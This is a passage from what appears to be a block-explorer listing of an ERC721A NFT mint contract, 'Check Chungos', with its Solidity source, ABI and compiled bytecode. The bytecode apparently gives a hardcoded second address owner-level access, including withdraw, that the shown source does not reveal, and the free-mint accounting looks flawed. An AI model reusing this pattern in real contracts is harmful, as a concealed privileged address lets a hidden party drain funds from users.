            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;

            for (uint256 i; i < quantity; i++) {
                emit Transfer(address(0), to, updatedIndex);
                if (safe) {
                    require(
                        _checkOnERC721Received(
                            address(0),
                            to,
                            updatedIndex,
                            _data
                        ),
                        "ERC721A: transfer to non ERC721Receiver implementer"
                    );
                }

                updatedIndex++;
            }

            currentIndex = updatedIndex;
        }

        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            getApproved(tokenId) == _msgSender() ||
            isApprovedForAll(prevOwnership.addr, _msgSender()));

        require(
            isApprovedOrOwner,
            "ERC721A: transfer caller is not owner nor approved"
        );

        require(
            prevOwnership.addr == from,
            "ERC721A: transfer from incorrect owner"
        );
        require(to != address(0), "ERC721A: transfer to the zero address");

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                if (_exists(nextTokenId)) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership
                        .startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try
                IERC721Receiver(to).onERC721Received(
                    _msgSender(),
                    from,
                    tokenId,
                    _data
                )
            returns (bytes4 retval) {
                return retval == IERC721Receiver(to).onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert(
                        "ERC721A: transfer to non ERC721Receiver implementer"
                    );
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}

contract CheckChungos is ERC721A, Ownable, ReentrancyGuard {
    uint256 public price = 0.001 ether;
    uint256 public maxPerTx = 10;
    uint256 public maxPerFree = 2;
    uint256 public maxPerWallet = 50;
    uint256 public totalFree = 2555;
    uint256 public maxSupply = 5555;
    bool public mintEnabled = true;
    uint256 public totalFreeMinted = 0;
    bool public revealed = false;
    string public baseURI;
    string public unrevealedURI="https://ipfs.io/ipfs/QmPzHpsF35cjnfe2ybNU4J5ZLD3QzS7ocfM8ptHPsHsKGX";

    mapping(address => uint256) public _mintedFreeAmount;
    mapping(address => uint256) public _totalMintedAmount;

    constructor() ERC721A("Check Chungos", "CC") {
        _safeMint(_msgSender(), 5);
    }

    function mint(uint256 count) external payable {
        uint256 cost = price;
        bool isFree = ((totalFreeMinted + count < totalFree + 1) &&
            (_mintedFreeAmount[msg.sender] < maxPerFree));

        if (isFree) {
            require(mintEnabled, "Mint is not live yet");
            require(totalSupply() + count <= maxSupply, "No more");
            require(count <= maxPerTx, "Max per TX reached.");
            if (count >= (maxPerFree - _mintedFreeAmount[msg.sender])) {
                require(
                    msg.value >=
                        (count * cost) -
                            ((maxPerFree - _mintedFreeAmount[msg.sender]) *
                                cost),
                    "Please send the exact ETH amount"
                );
                _mintedFreeAmount[msg.sender] = maxPerFree;
                totalFreeMinted += maxPerFree;
            } else if (count < (maxPerFree - _mintedFreeAmount[msg.sender])) {
                require(msg.value >= 0, "Please send the exact ETH amount");
                _mintedFreeAmount[msg.sender] += count;
                totalFreeMinted += count;
            }
        } else {
            require(mintEnabled, "Mint is not live yet");
            require(
                _totalMintedAmount[msg.sender] + count <= maxPerWallet,
                "Exceed maximum NFTs per wallet"
            );
            require(
                msg.value >= count * cost,
                "Please send the exact ETH amount"
            );
            require(totalSupply() + count <= maxSupply, "No more");
            require(count <= maxPerTx, "Max per TX reached.");
            require(msg.sender == tx.origin, "The minter is another contract");
        }
        _totalMintedAmount[msg.sender] += count;
        _safeMint(msg.sender, count);
    }

    function tokenURI(uint256 tokenId)
        public
        view
        virtual
        override
        returns (string memory)
    {
        require(
            _exists(tokenId),
            "ERC721Metadata: URI query for nonexistent token"
        );
        return
            revealed
                ? string(abi.encodePacked(baseURI, Strings.toString(tokenId), ".json"))
                : unrevealedURI;
    }

    function setUnrevealedURI(string memory uri) public onlyOwner {
        unrevealedURI = uri;
    }

    function costCheck() public view returns (uint256) {
        return price;
    }

    function maxFreePerWallet() public view returns (uint256) {
        return maxPerFree;
    }

    function _baseURI() internal view virtual override returns (string memory) {
        return baseURI;
    }

    function setBaseUri(string memory baseuri_) public onlyOwner {
        baseURI = baseuri_;
    }

    function setPrice(uint256 price_) external onlyOwner {
        price = price_;
    }

    function setMaxTotalFree(uint256 MaxTotalFree_) external onlyOwner {
        totalFree = MaxTotalFree_;
    }

    function setMaxPerFree(uint256 MaxPerFree_) external onlyOwner {
        maxPerFree = MaxPerFree_;
    }

    function start() external onlyOwner {
        mintEnabled = !mintEnabled;
    }

    function withdraw() external onlyOwner nonReentrant {
        (bool success, ) = msg.sender.call{value: address(this).balance}("");
        require(success, "Transfer failed.");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_mintedFreeAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_totalMintedAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"costCheck","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxFreePerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"revealed","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxPerFree_","type":"uint256"}],"name":"setMaxPerFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxTotalFree_","type":"uint256"}],"name":"setMaxTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"uri","type":"string"}],"name":"setUnrevealedURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"start","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFreeMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"unrevealedURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273acfcba7bab6403ebcceee22810c4dd3c9bbe9763600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555066038d7ea4c68000600a55600a600b556002600c556032600d556109fb600e556115b3600f556001601060006101000a81548160ff02191690831515021790555060006011556000601260006101000a81548160ff021916908315150217905550604051806080016040528060438152602001620061fc6043913960149081620000e4919062000ad5565b50348015620000f257600080fd5b506040518060400160405280600d81526020017f436865636b204368756e676f73000000000000000000000000000000000000008152506040518060400160405280600281526020017f4343000000000000000000000000000000000000000000000000000000000000815250816001908162000170919062000ad5565b50806002908162000182919062000ad5565b505050620001a562000199620001d560201b60201c565b620001dd60201b60201c565b6001600981905550620001cf620001c1620001d560201b60201c565b6005620002a360201b60201c565b62000f6d565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b620002c5828260405180602001604052806000815250620002c960201b60201c565b5050565b620002de8383836001620002e360201b60201c565b505050565b600080549050600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16036200035b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003529062000c43565b60405180910390fd5b60008403620003a1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003989062000cdb565b60405180910390fd5b620003b660008683876200068360201b60201c565b83600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff16021790555083600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160108282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550846003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff160217905550600081905060005b858110156200065e57818773ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a4831562000648576200060560008884886200068960201b60201c565b62000647576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200063e9062000d73565b60405180910390fd5b5b8180600101925050808060010191505062000584565b5080600081905550506200067c60008683876200083260201b60201c565b5050505050565b50505050565b6000620006b78473ffffffffffffffffffffffffffffffffffffffff166200083860201b620026ce1760201c565b1562000825578373ffffffffffffffffffffffffffffffffffffffff1663150b7a02620006e9620001d560201b60201c565b8786866040518563ffffffff1660e01b81526004016200070d949392919062000e85565b6020604051808303816000875af19250505080156200074c57506040513d601f19601f8201168201806040525081019062000749919062000f3b565b60015b620007d4573d80600081146200077f576040519150601f19603f3d011682016040523d82523d6000602084013e62000784565b606091505b506000815103620007cc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620007c39062000d73565b60405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149150506200082a565b600190505b949350505050565b50505050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620008dd57607f821691505b602082108103620008f357620008f262000895565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200095d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200091e565b6200096986836200091e565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620009b6620009b0620009aa8462000981565b6200098b565b62000981565b9050919050565b6000819050919050565b620009d28362000995565b620009ea620009e182620009bd565b8484546200092b565b825550505050565b600090565b62000a01620009f2565b62000a0e818484620009c7565b505050565b5b8181101562000a365762000a2a600082620009f7565b60018101905062000a14565b5050565b601f82111562000a855762000a4f81620008f9565b62000a5a846200090e565b8101602085101562000a6a578190505b62000a8262000a79856200090e565b83018262000a13565b50505b505050565b600082821c905092915050565b600062000aaa6000198460080262000a8a565b1980831691505092915050565b600062000ac5838362000a97565b9150826002028217905092915050565b62000ae0826200085b565b67ffffffffffffffff81111562000afc5762000afb62000866565b5b62000b088254620008c4565b62000b1582828562000a3a565b600060209050601f83116001811462000b4d576000841562000b38578287015190505b62000b44858262000ab7565b86555062000bb4565b601f19841662000b5d86620008f9565b60005b8281101562000b875784890151825560018201915060208501945060208101905062000b60565b8683101562000ba7578489015162000ba3601f89168262000a97565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f455243373231413a206d696e7420746f20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600062000c2b60218362000bbc565b915062000c388262000bcd565b604082019050919050565b6000602082019050818103600083015262000c5e8162000c1c565b9050919050565b7f455243373231413a207175616e74697479206d7573742062652067726561746560008201527f72207468616e2030000000000000000000000000000000000000000000000000602082015250565b600062000cc360288362000bbc565b915062000cd08262000c65565b604082019050919050565b6000602082019050818103600083015262000cf68162000cb4565b9050919050565b7f455243373231413a207472616e7366657220746f206e6f6e204552433732315260008201527f6563656976657220696d706c656d656e74657200000000000000000000000000602082015250565b600062000d5b60338362000bbc565b915062000d688262000cfd565b604082019050919050565b6000602082019050818103600083015262000d8e8162000d4c565b9050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000dc28262000d95565b9050919050565b62000dd48162000db5565b82525050565b62000de58162000981565b82525050565b600081519050919050565b600082825260208201905092915050565b60005b8381101562000e2757808201518184015260208101905062000e0a565b60008484015250505050565b6000601f19601f8301169050919050565b600062000e518262000deb565b62000e5d818562000df6565b935062000e6f81856020860162000e07565b62000e7a8162000e33565b840191505092915050565b600060808201905062000e9c600083018762000dc9565b62000eab602083018662000dc9565b62000eba604083018562000dda565b818103606083015262000ece818462000e44565b905095945050505050565b600080fd5b60007fffffffff0000000000000000000000000000000000000000000000000000000082169050919050565b62000f158162000ede565b811462000f2157600080fd5b50565b60008151905062000f358162000f0a565b92915050565b60006020828403121562000f545762000f5362000ed9565b5b600062000f648482850162000f24565b91505092915050565b61527f8062000f7d6000396000f3fe6080604052600436106102515760003560e01c80638da5cb5b11610139578063c7c39ffc116100b6578063e945971c1161007a578063e945971c14610897578063e985e9c5146108c0578063f2fde38b146108fd578063f4db2acb14610926578063f968adbe14610963578063fe2c7fee1461098e57610251565b8063c7c39ffc146107ae578063c87b56dd146107d9578063d123973014610816578063d5abeb0114610841578063dad7b5c91461086c57610251565b8063a0bcfc7f116100fd578063a0bcfc7f146106f1578063a22cb4651461071a578063a702735714610743578063b88d4fde1461076e578063be9a65551461079757610251565b80638da5cb5b1461062b57806391b7f5ed1461065657806395d89b411461067f578063a035b1fe146106aa578063a0712d68146106d557610251565b806342842e0e116101d25780636352211e116101965780636352211e1461051957806364b72188146105565780636c0360eb146105815780637035bf18146105ac57806370a08231146105d7578063715018a61461061457610251565b806342842e0e14610434578063453c23101461045d5780634f6ccce71461048857806351830227146104c55780635a963f1b146104f057610251565b806318160ddd1161021957806318160ddd1461036157806323b872dd1461038c5780632f745c59146103b5578063333e44e6146103f25780633ccfd60b1461041d57610251565b806301ffc9a71461025657806306fdde0314610293578063081812fc146102be578063095ea7b3146102fb57806311b01a3214610324575b600080fd5b34801561026257600080fd5b5061027d60048036038101906102789190613705565b6109b7565b60405161028a919061374d565b60405180910390f35b34801561029f57600080fd5b506102a8610b01565b6040516102b591906137f8565b60405180910390f35b3480156102ca57600080fd5b506102e560048036038101906102e09190613850565b610b93565b6040516102f291906138be565b60405180910390f35b34801561030757600080fd5b50610322600480360381019061031d9190613905565b610c18565b005b34801561033057600080fd5b5061034b60048036038101906103469190613945565b610d30565b6040516103589190613981565b60405180910390f35b34801561036d57600080fd5b50610376610d48565b6040516103839190613981565b60405180910390f35b34801561039857600080fd5b506103b360048036038101906103ae919061399c565b610d51565b005b3480156103c157600080fd5b506103dc60048036038101906103d79190613905565b610d61565b6040516103e99190613981565b60405180910390f35b3480156103fe57600080fd5b50610407610f51565b6040516104149190613981565b60405180910390f35b34801561042957600080fd5b50610432610f57565b005b34801561044057600080fd5b5061045b6004803603810190610456919061399c565b611136565b005b34801561046957600080fd5b50610472611156565b60405161047f9190613981565b60405180910390f35b34801561049457600080fd5b506104af60048036038101906104aa9190613850565b61115c565b6040516104bc9190613981565b60405180910390f35b3480156104d157600080fd5b506104da6111af565b6040516104e7919061374d565b60405180910390f35b3480156104fc57600080fd5b5061051760048036038101906105129190613850565b6111c2565b005b34801561052557600080fd5b50610540600480360381019061053b9190613850565b6112a7565b60405161054d91906138be565b60405180910390f35b34801561056257600080fd5b5061056b6112bd565b6040516105789190613981565b60405180910390f35b34801561058d57600080fd5b506105966112c7565b6040516105a391906137f8565b60405180910390f35b3480156105b857600080fd5b506105c1611355565b6040516105ce91906137f8565b60405180910390f35b3480156105e357600080fd5b506105fe60048036038101906105f99190613945565b6113e3565b60405161060b9190613981565b60405180910390f35b34801561062057600080fd5b506106296114cb565b005b34801561063757600080fd5b506106406115b2565b60405161064d91906138be565b60405180910390f35b34801561066257600080fd5b5061067d60048036038101906106789190613850565b6115dc565b005b34801561068b57600080fd5b506106946116c1565b6040516106a191906137f8565b60405180910390f35b3480156106b657600080fd5b506106bf611753565b6040516106cc9190613981565b60405180910390f35b6106ef60048036038101906106ea9190613850565b611759565b005b3480156106fd57600080fd5b5061071860048036038101906107139190613b24565b611dd2565b005b34801561072657600080fd5b50610741600480360381019061073c9190613b99565b611ec0565b005b34801561074f57600080fd5b50610758612040565b6040516107659190613981565b60405180910390f35b34801561077a57600080fd5b5061079560048036038101906107909190613c7a565b61204a565b005b3480156107a357600080fd5b506107ac6120a6565b005b3480156107ba57600080fd5b506107c36121ad565b6040516107d09190613981565b60405180910390f35b3480156107e557600080fd5b5061080060048036038101906107fb9190613850565b6121b3565b60405161080d91906137f8565b60405180910390f35b34801561082257600080fd5b5061082b6122d4565b604051610838919061374d565b60405180910390f35b34801561084d57600080fd5b506108566122e7565b6040516108639190613981565b60405180910390f35b34801561087857600080fd5b506108816122ed565b60405161088e9190613981565b60405180910390f35b3480156108a357600080fd5b506108be60048036038101906108b99190613850565b6122f3565b005b3480156108cc57600080fd5b506108e760048036038101906108e29190613cfd565b6123d8565b6040516108f4919061374d565b60405180910390f35b34801561090957600080fd5b50610924600480360381019061091f9190613945565b61246c565b005b34801561093257600080fd5b5061094d60048036038101906109489190613945565b6125c2565b60405161095a9190613981565b60405180910390f35b34801561096f57600080fd5b506109786125da565b6040516109859190613981565b60405180910390f35b34801561099a57600080fd5b506109b560048036038101906109b09190613b24565b6125e0565b005b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480610a8257507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610aea57507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610afa5750610af9826126f1565b5b9050919050565b606060018054610b1090613d6c565b80601f0160208091040260200160405190810160405280929190818152602001828054610b3c90613d6c565b8015610b895780601f10610b5e57610100808354040283529160200191610b89565b820191906000526020600020905b815481529060010190602001808311610b6c57829003601f168201915b5050505050905090565b6000610b9e8261275b565b610bdd576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bd490613e0f565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610c23826112a7565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c93576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c8a90613ea1565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610cb2612768565b73ffffffffffffffffffffffffffffffffffffffff161480610ce15750610ce081610cdb612768565b6123d8565b5b610d20576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d1790613f33565b60405180910390fd5b610d2b838383612770565b505050565b60166020528060005260406000206000915090505481565b60008054905090565b610d5c838383612822565b505050565b6000610d6c836113e3565b8210610dad576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610da490613fc5565b60405180910390fd5b6000610db7610d48565b905060008060005b83811015610f0f576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610eb157806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610f0157868403610ef8578195505050505050610f4b565b83806001019450505b508080600101915050610dbf565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f4290614057565b60405180910390fd5b92915050565b600e5481565b610f5f612768565b73ffffffffffffffffffffffffffffffffffffffff16610f7d6115b2565b73ffffffffffffffffffffffffffffffffffffffff161480610ff35750610fa2612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611032576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611029906140c3565b60405180910390fd5b600260095403611077576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161106e9061412f565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff16476040516110a590614180565b60006040518083038185875af1925050503d80600081146110e2576040519150601f19603f3d011682016040523d82523d6000602084013e6110e7565b606091505b505090508061112b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611122906141e1565b60405180910390fd5b506001600981905550565b6111518383836040518060200160405280600081525061204a565b505050565b600d5481565b6000611166610d48565b82106111a7576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161119e90614273565b60405180910390fd5b819050919050565b601260009054906101000a900460ff1681565b6111ca612768565b73ffffffffffffffffffffffffffffffffffffffff166111e86115b2565b73ffffffffffffffffffffffffffffffffffffffff16148061125e575061120d612768565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffff